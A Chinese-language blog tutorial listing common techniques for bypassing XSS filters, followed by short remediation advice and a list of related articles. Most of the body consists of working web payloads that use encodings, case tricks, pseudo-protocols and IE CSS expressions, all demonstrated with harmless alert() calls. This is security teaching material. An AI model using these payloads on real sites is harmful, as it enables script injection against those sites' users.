[ 常见漏洞篇 ]常见web漏洞总结------XSS绕过方式

最新推荐文章于 2025-06-19 17:33:38 发布
最新推荐文章于 2025-06-19 17:33:38 发布
阅读量4.4k 收藏 36
点赞数 6
CC 4.0 BY-SA版权
分类专栏: 轮播展示专栏 文章标签: javascript 开发语言 ecmascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51577576/article/details/121754977

本文具体写到了常见的XSS绕过方式,间的的介绍了一下修复方式

写的比较细,比较深,需要一定的基础才能看懂,仔细读完

不懂的可以百度查一查或者私信我,相信会有很大收获

目录

一、Xss绕过方式:

1. 前端过滤

2. 双写绕过

3. 事件绕过   

4. 大小写绕过

5. 注释干扰绕过

6. 伪协议绕过

 7. 空格回车Tab绕过

8. 编码绕过

1. base64编码:

2. JS编码:

3. 十六进制:

4. unicode:

5. HTML实体编码:

6. URL编码:

9. CSS绕过

1. 利用IE特性绕过XSS过滤:

2. 利用css特性绕过xss过滤:

3. IE中利用CSS触发xss:

二、修复建议

一、Xss绕过方式:

1. 前端过滤

burp抓包改包绕过

2. 双写绕过

<scri<script>pt>alert(111)</scri<script>pt>

3. 事件绕过   

如:onclick,onmousemove事件

4. 大小写绕过

<SCRIPT>aLeRT(111)</sCRIpt>

5. 注释干扰绕过

如:<scri<!--test--> pt> alert(1);</scr<!--test--> ipt>

6. 伪协议绕过

如: 111"> <a href= "javascript:alert(document.domain)">xss </a>

        < table background= "javascript:alert(/xss/)"> </table>

        <img srC= "javascript:alert('ss);" >

 7. 空格回车Tab绕过

空格:<img src= "javascript:alert('xss');" >

TAB:< img src= "javasc :ript:alert('ss');" >

回车:< img src= "jav

          ascript:

          alert('xss');" >

8. 编码绕过

1. base64编码:

如果过滤了 < > ' " script,可以用base64编码

eval(") eval函数把字符串 当做程序执行atob函数是将base64密文转换为名文

"> <script> eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ== ));</script>

base64编码多用于如下两种情况:

1. <a href= "可控点">

2. < iframe src= "可控点">

举例:

<a href= "data:text/html;base64,PGItZyBzcmM9eCBvbmVycm9yPWFsZXJOKDEpPg==">test<
/a>

这样当test A链接点击时就会以data协议页面以html/text的方式解析编码为base64然后单点击

a链接时base64的编码就被还原成我们原本的< img src=x onerror= alert(1)>

2. JS编码:

八进制:

三个八进制数字,如果个数不够,在前面补0,例如"e'的编码为"\145"

3. 十六进制:

两个十六进制数字,如果个数不够,在前面补0,'e'的编码为"\x65"

十六进制前面加上\x可以被JS识别

尖括号被转义时,利用十六进制绕过

如:\\x3cscript\\x3ealert(document.domain);\x3c/script\x3e

4. unicode:

四个十六进制数字,如果个数不够,在前面补0,'e'的编码为"\u0065"

十六进制前面加上\u00变成JS可识别的Unicode编码

\\u003cscript\u003ealert(document.domain);\\u003c/script\\u003e

对于一些控制字符,使用特殊的C类型的转义风格(例如\n和\r)

5. HTML实体编码:

字符编码:十进制、十六进制编码,样式为"&#数值;",例如"<"可以编码为"&#060;和"&#x3c;"

<img src="x"onerror= "&#97;&#108;&# 101;&#114;&#1 16;&#40;&#49;&#41;">

浏览器是不会在html|标签里解析js编码的,所以我们在onerror=后面放js中的编码是不会解析你放进去是什么就是什么

HTML5新增的实体命名编码

&colon; => [冒号]
&NewLine; => [换行]

<a href= "javasc&NewLine;ript&colon;alert(1)">click</a> 

6. URL编码:

进行两次URL全编码

9. CSS绕过

1. 利用IE特性绕过XSS过滤:

IE中两个反单引号hgj `` 可以闭合一个左边双引号

``onmousemove= alert(1)

2. 利用css特性绕过xss过滤:

设置background:url,利用JavaScript伪协议执行js,目前只有IE浏览器支持

background-color:# f00;background:url(javascript:alert(document.domain);");
低版本IE浏览器6 10 D版本弹窗成功

3. IE中利用CSS触发xss:

CSS中的注释/**/

xss:expres/**/sion(if(!window.x){alert(document.domain);window.x= 1;})

二、修复建议

1. 过滤输入的数据,包括  `<>on*等非法字符

2. 对输出到页面的数据进行相应的编码转换,包括HTML实体编码、JavaScript编码等

3. 验证请求头的referer值

三、相关文章分享

pikachu靶场通关之XSS(一)

常见web漏洞总结------SQL注入

常见web漏洞总结------CSRF

常见web漏洞------XXE

pikachu靶场通关之暴力破解

业务逻辑漏洞

2021年 owasp top 10

XSS的一些绕过手法
qq_30787769的博客
12-09 1798
注:XSS我没有实战研究过所以大多都是靶场用的手法和别人的一些文章,可能实战的时候效果不好 1.绕过简单的xss防护 1.如果双引号被禁用就用单引号。 2.针对黑名单过滤,过滤一般不全,在过滤了img还有input或者div 3.过滤了onclik,onmouseover,可以尝试冷门的事件触发onmouseenter(注意冷门最好) 4.过滤了()可以尝试(),过滤了‘可以尝试反引号,这个是反引...
xss防护绕过方法
最新发布
rasssel的博客
07-11 1147
Payload技术类型优势常见用途绕过能力最基础脚本注入简单、直观用于初步测试 XSS 是否存在易被过滤利用事件触发兼容性强输入框、HTML属性中注入绕过<script>过滤非主流标签 + 属性HTML5 支持好可混淆绕过高级防护绕过技巧URL 中不能直接包含某些字符(如空格、中文、原字符URL 编码示例%3C<script>→%3E%2F/script→%2Fscript如果服务器未对 URL 编码内容进行检测,就会被绕过
[漏洞]XSS漏洞详解之绕过手段
software_test010的博客
06-19 804
前文我们对XSS的概念、危害、原理、分类进行了介绍,并对XSS的靶场搭建进行了实战演示,接下来为大家继续讲解XSS有哪些绕过手段。
XSSBypass:XSS绕过技术
05-17
XSS绕过 XSS绕过技术,带来乐趣和收益。 尝试使用XSS漏洞逐行绕过Web应用程序安全性XSS过滤器。
XSS漏洞-03】XSS漏洞语句构造和绕过方法实例
m0_64378913的博客
05-14 4737
目录1 XSS语句构造方式1.1 第一种:利用[<>]构造HTML/JS语句1.2 第二种:利用javascript:伪协议1.3 第三种:事件驱动1.4 第四种:利用CSS(层叠样式脚本)1.5 其他标签及手法2 XSS语句变形及绕过2.1 第一种:大小写混编2.2 第二种:**双写绕过**。2.3 第三种:**引号的使用**2.4 第四种:使用 [/] 代替空格2.5 第五种:在一些关键字内插入回车符与Tab符2.6 第六种:编码绕过2.7 第七种:拆分跨站2.8
xss绕过限制(学习笔记)
qq_38348692的博客
07-20 593
1.绕过magic_quotes_gpc(魔术引号):多用于反射型漏洞 2.HEX编码:转换成16进制,把插入的脚本转换成16进制后再放到url中 (3)改变大小写 4.关闭标签 ...
xss-labs靶场:level7攻略 双写绕过
godfish44的博客
09-15 552
其实这也是程序的一种黑名单策略,会对黑名单中的关键词进行过滤和删除,难道我们就真的没办法了吗?不,我命由我不由天,我们要做的就是想尽一切办法欺骗程序。是在script中又重新插入了一个script单词,这样程序识别到中间完整的script并将它删除后,我们就又得到了一个完整的script,即。经过第六关的简单修整我们来看第七关,第七关利用了一个很有趣且巧妙的技巧------双写绕过。我们现在提交payload试一下。不出意外的,我们取得了成功!我们发现了一个有趣的现象。不出意外的,我们失败了。
Web安全XSS-Labs靶场通关详解:常见XSS漏洞场景及绕过技巧分析与防御建议
04-17
内容概要:本文档详细介绍了 XSS-Labs靶场的通关思路及解法,涵盖了常见XSS(跨站脚本攻击)漏洞场景。文档首先介绍了XSS的三种类型(反射型、存储型、DOM型)及常见注入点(URL参数、表单输入、Cookie、HTTP头)...
WEB渗透学习-XSS-labs靶场
04-20
4. **XSS过滤与绕过**:靶场会设置一些过滤机制,防止恶意脚本执行。学习者需要了解常见的过滤规则,如HTML实体编码、JavaScript事件禁用等,并尝试绕过这些防护措施。 5. **XSS防御策略**:除了攻击,XSS-labs也会...
第28天:WEB漏洞-XSS跨站之WAF绕过及安全修复1
08-03
WEB 漏洞-XSS 跨站之 WAF 绕过及安全修复#常规 WAF 绕过思路标签语法替换特殊符号干扰提交方式更改垃圾数据溢出加密解密算法结合其他漏洞绕过#自动化
Web安全XSS-Labs靶场实战:从新手到高手的跨站脚本攻击与防御深度解析
04-17
文中通过具体关卡的详细解析,展示了如何在不同过滤条件下构造有效的 XSS 攻击,如利用符号编码、事件触发、伪协议、大小写绕过、双写绕过、Unicode 编码、隐藏信息利用、HTTP 请求头注入等技巧。最后,强调了 XSS ...
关于对XSS原理分析与绕过总结
stopys6的博客
10-08 2578
如果服务器与客户端之间要传输某个特殊字符,像是<>,'等这类会被当做标签或者属性值等来解析的字符,为了避免歧义就需要使用到HTML实体化编码来进行编码了。Q2、HTML编码的几种方式别名形式:因为比较多可以见HTML 字符实体 (w3school.com.cn)十六进制:像就会被编码为<div>十进制:上述标签在十进制会被编码为<div>Q3、为什么需要JavaScript解码?通过JavaScript编码,可以对特殊字符进行转义,防止数据在传输过程中产生语法错误或安全漏洞
xss绕过尖括号和双括号_记录一次有意思的XSS过滤绕过2
weixin_36211712的博客
12-23 2456
前几天在漏洞挖掘中遇到个xss,感觉绕过过程蛮有意思的,写文章记录下。接下里是我对这个xss详细的分析和绕过存在问题站点http://******/index/appInfo?appId=784&url=xss当我查看源代码搜索xss:一处输出点:继续搜索第二处输出点:两次输出,第一次输出是在input标签中,第二次是在js中,这里不考虑input中利用了。因为input的type为hi...
xss绕过尖括号和双括号_腾讯云WAF绕过 之 门神waf绕过挑战赛
weixin_35355560的博客
01-07 1345
门神WAF绕过挑战赛No.1起因好友在群里发了个腾讯云的门神waf挑战赛,可以尝试bypass sql注入和xss。钱虽然不多,但是就当给午餐加杯酸奶。https://security.tencent.com/index.php/announcement/msg/189因为最近在做项目,只能中午休息时抽空写文章,主要分享XSS绕过思路,就不太过细致的分析了随便尝试了几个payload发...
xss绕过方式
weixin_55821558的博客
03-18 9165
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一.xss的类型以及常用标签 二.xss常用绕过 总结 前言 xss(cross-site-scripting)中文:跨站脚本攻击 常年位于owasp top ten,可见他的地位。 基于javascript完成恶意攻击,javascript使用灵活 他可控制网页的行为 操作html、css、和浏览器,所以他的危害性特别大,了解并学习xss原理对于防范xss攻击意义重大。 提示:以下...
【网络安全 --- XSS绕过xss绕过手法及思路你了解吗?常见及常用的绕过手法了解一下吧
m0_67844671的博客
10-18 2059
【网络安全 --- XSS绕过xss绕过手法及思路你了解吗?常见及常用的绕过手法了解一下吧;你知道xss如何绕过吗?本讲述了一些xss常见绕过手法及技巧,包括双写,大小写绕过,编码绕过等,过来看看吧
XSS攻击绕过方法大全,XSS攻击技巧,收集100种绕过方法分享(2024最新)
热门推荐
白帽黑客八哥的博客
12-12 1万+
尽管许多网站实施了输入过滤措施来防止跨站脚本(XSS)攻击,但在特定条件下,经过精心编码的脚本仍有可能实施XSS注入。本文旨在为专业的安全测试人员提供一个跨站脚本漏洞的检测指南。
xss绕过方法(前端绕过,拼凑绕过,注释干扰绕过,编码绕过
qq_43814486的博客
05-05 9420
绕过思路 前端绕过:前端有很多种方法绕过,比如抓包重放或者修改前端代码。 大小写绕过:一般后台对输入写进行过滤使用两种方法:1,使用正则匹配,2,用查找的函数查找。这两种方法可以用大小写混合的方式进行绕过,而后端是不管大小写的,可以正常执行我们的语句。 拼凑:后端会对我们输入的标签进行替换,但只替换一次,所以可以这样: <scri<script>pt>alert("hell...
xss绕过
weixin_51692662的博客
08-19 2791
xss绕过
ColdFusion 10 & 11 漏洞利用代码:CVE-2015-0345 XSS到RCE
资源摘要信息:...通过这个知识点的介绍,我们可以看到,无论是Web应用的开发者还是网络安全工程师,都需要对这类常见Web漏洞有深入的理解,并且在实践中采取相应的安全措施,以确保Web应用的安全稳定运行。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

寒蝉听雨[原ID_PowerShell]

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值